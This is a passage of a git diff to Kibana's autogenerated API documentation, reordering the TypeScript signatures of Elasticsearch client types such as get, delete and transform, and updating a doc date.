undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; expect?: string | string[] | undefined; forwarded?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; 
\"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" + "{ accept?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; 
\"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; allow?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; authorization?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; date?: string | string[] | undefined; etag?: string | string[] | undefined; expect?: string | string[] | undefined; expires?: string | string[] | undefined; forwarded?: string | string[] | undefined; from?: string | string[] | undefined; host?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; location?: string | string[] | undefined; origin?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; range?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; 
\"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; warning?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" ], "path": "packages/core/elasticsearch/core-elasticsearch-server/src/client/scopeable_request.ts", "deprecated": false 
@@ -830,7 +830,61 @@ "\nA {@link ElasticsearchClient | client} to be used to query the ES cluster on behalf of the Kibana internal user" ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -898,7 +948,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -924,33 +974,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -976,33 +1000,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -1962,6 +1960,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", 
@@ -2421,7 +2421,61 @@ "\nA {@link ElasticsearchClient | client} to be used to query the elasticsearch cluster\non behalf of the internal Kibana user." ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -2489,7 +2539,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -2515,33 +2565,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -2567,33 +2591,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -3553,6 +3551,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", 
@@ -3624,7 +3624,61 @@ "\nA {@link ElasticsearchClient | client} to be used to query the elasticsearch cluster\non behalf of the user that initiated the request to the Kibana server." ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -3692,7 +3742,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -3718,33 +3768,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -3770,33 +3794,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -4756,6 +4754,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", 
@@ -5061,7 +5061,61 @@ "\nClient used to query the elasticsearch cluster.\n" ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -5129,7 +5179,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -5155,33 +5205,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -5207,33 +5231,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -6193,6 +6191,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", diff --git a/api_docs/kbn_core_elasticsearch_server.mdx b/api_docs/kbn_core_elasticsearch_server.mdx index 12976e6f288b5..3afc9a04c8629 100644 --- a/api_docs/kbn_core_elasticsearch_server.mdx +++ b/api_docs/kbn_core_elasticsearch_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-elasticsearch-server title: "@kbn/core-elasticsearch-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-elasticsearch-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-elasticsearch-server'] --- import kbnCoreElasticsearchServerObj from './kbn_core_elasticsearch_server.devdocs.json'; diff --git a/api_docs/kbn_core_elasticsearch_server_internal.devdocs.json b/api_docs/kbn_core_elasticsearch_server_internal.devdocs.json index ba4100d6fd35d..d05f0fed58931 100644 --- a/api_docs/kbn_core_elasticsearch_server_internal.devdocs.json +++ b/api_docs/kbn_core_elasticsearch_server_internal.devdocs.json 
@@ -44,7 +44,61 @@ "label": "client", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -112,7 +162,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -138,33 +188,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -190,33 +214,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: 